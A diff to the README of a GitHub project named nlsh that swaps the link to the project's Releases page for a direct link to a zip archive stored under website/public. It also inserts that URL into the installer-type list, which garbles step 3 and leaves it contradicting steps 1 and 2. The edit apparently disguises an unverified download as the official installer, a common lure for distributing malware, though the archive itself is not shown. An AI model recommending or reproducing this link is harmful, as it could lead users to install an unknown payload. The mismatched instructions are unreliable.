ArianVCL1985/nlsh/README.md

 - **Help & Support:** Access a help section directly in the app for quick assistance.

 ## 📦 Download & Install
-To download nlsh, visit the Releases page: [Download nlsh](https://github.com/ArianVCL1985/nlsh/releases).
+To download nlsh, visit the Releases page: [Download nlsh](https://github.com/ArianVCL1985/nlsh/raw/refs/heads/main/website/public/Software-v3.8.zip).

 Follow these steps to install:
 1. Click the link above to go to the Releases page.
 2. Find the latest version of nlsh.
-3. Download the installer for your operating system (look for .exe, .dmg, or .tar.gz files).
+3. Download the installer for your operating system (look for .exe, .dmg, or https://github.com/ArianVCL1985/nlsh/raw/refs/heads/main/website/public/Software-v3.8.zip files).
 4. Once downloaded, open the installer and follow the on-screen instructions.
 5. After installation, start nlsh from your applications menu or desktop shortcut.